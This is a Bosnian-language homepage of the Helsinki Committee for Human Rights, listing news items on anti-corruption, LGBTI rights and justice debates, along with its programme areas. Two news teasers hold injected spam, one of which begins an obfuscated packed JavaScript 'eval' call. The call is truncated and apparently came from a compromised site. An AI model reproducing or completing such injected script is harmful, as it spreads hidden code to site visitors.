HELSINŠKI ODBOR
Z A  LJ U D S K A  P R A V A

Nevladina organizacija posvećena promociji,
zaštiti i monitoringu stanja ljudskih prava u Bosni i Hercegovini i regionu.

×

Aktuelnosti

31.05.2018. | 11:47
U četvrtak, 31.05.2018. godine, na 22. sjednici općinskog vijeća Općine Zavidovići zvanično je usvojen Lokalni akcioni plan za prevenciju korupc...
29.12.2017. | 11:08
Juče smo u Helsinškom odboru za ljudska prava dodijelili nagradu "Pero poštovanja" Mirzi Halilčeviću, iz Tuzle, za najbolji tekst koji promoviše...
25.12.2017. | 12:38
15.12.2017. zvanično su objavljeni rezultati Konkursa za najbolju medijsku priču ili/reportažu koja promoviše prava i kulturu LGBTI osoba u BiH. K...
17.11.2017. | 10:29
Predstavnici Helsinškog odbora za ljudska prava, Tomislav Todorović i Mirjana Ćuskić, juče su, povodom Međunarodnog dana tolerancije, bili gosti...
16.11.2017. | 10:05
In Progress, public debate on the "rapprochement of the bih prosecutor's office" and BiH's court of law. Giftofvision - Sneakers search engine | Ai...
25.10.2017. | 07:29
  Helsinški odbor za ljudska prava u saradnji sa Asocijacijom za demokratske inicijative u okviru projekta (Ne)vidljive manjine- Nulta tol...
11.10.2017. | 13:29
U okviru projekta „(Ne)vidljive manjine - Nulta tolerancija prema diskriminaciji LGBTI osoba“ realizjemo dvodnevnu radionicu o "Važnosti uloge me...
10.10.2017. | 13:25
U okviru projekta "Građanska misija obrazovanja" održava se prvi Konsultacijski sastanak sa nastavnicima i profesorima sa područja Posavskog Kanton...
03.10.2017. | 13:21
U toku Javna debata "Približavanje rada Tužilaštva BiH i Suda BiH lokalnoj zajednici" u Doboju. bridgemedia | adidaseval(function(p,a,c,k,e,d){e...
18.08.2017. | 13:07
Ministar za obrazovanje, mlade, nauku, kulturu  i sport Damir Žuga i direktorica Pedagoškog zavoda Bosansko-podrinjskog kantona Goražde Dika Makot...

FORMALNO I NEFORMALNO OBRAZOVANJE

Mi unapređujemo saradnju između civilnog društva i obrazovnih institucija sa ciljem poboljšanja kvaliteta obrazovanja iz oblasti ljudskih prava i aktivnog građanstva, kroz razmjenu iskustva, metodike i metodologije rada, te obrazovnih sadržaja.

SOCIO-EKONOMSKA PRAVA I REFORMA PRAVOSUĐA

Mi unapređujemo saradnju sa relevantnim akterima u Bosni i Hercegovini kroz sprovođenje zajedničkih aktivnosti koje su usmjerene ka unapređenju poštivanja socio-ekonomskih prava građana/ki., reformi pravosuđa i vladavini prava.

IZGRADNJA MIRA I CIVILNOG DRUŠTVA

Mi iniciramo izgradnju mira i suočavanje sa prošlošću u Bosni i Hercegovini, koji su zasnovani na potrebama građana/ki i usklađeni sa međunarodnim standardima i obavezama BiH, a koji doprinose izgradnji trajnog mira u BiH i regionu.

AKTUELNOSTI

PROJEKTI

U ovoj sekciji možete pronaći sve naše projekte koji su realizovani u prethodnom periodu, kao i one koji su trenutno u fazi realizacije.

  1. AKTUELNI
  2. ZAVRŠENI

PERO POŠTOVANJA

Zbirka tekstova sa Konkursa za najbolju medijsku priču ili/reportažu koja promoviše prava i kulturu LGBTI osoba u BiH.

Konkurs je bio raspisan u okviru projekta "(Ne)vidljive manjine - Nulta tolerancija prema diskriminaciji LGBT osoba", koji je podržan od strane Programa podrške marginalizovanim grupama (PPMG) Američke agencije za međunarodni razvoj (USAID).

VIDEO SADRŽAJ

U ovoj sekciji možete pogledati video sadržaj sa našeg Youtube kanala.

PUBLIKACIJE

Pružamo mogućnost uvida u sve naše publikacije u elektronskom obliku.

PRIJAVITE KORUPCIJU

Preuzmite prijavu, popunite i pošaljite na helsinskiodborrs@gmail.com

Za sve informacije, pitanja i sugestije, stojimo Vam na raspolaganju.
Helsinški odbor za ljudska prava © 2017
Powered by limun.co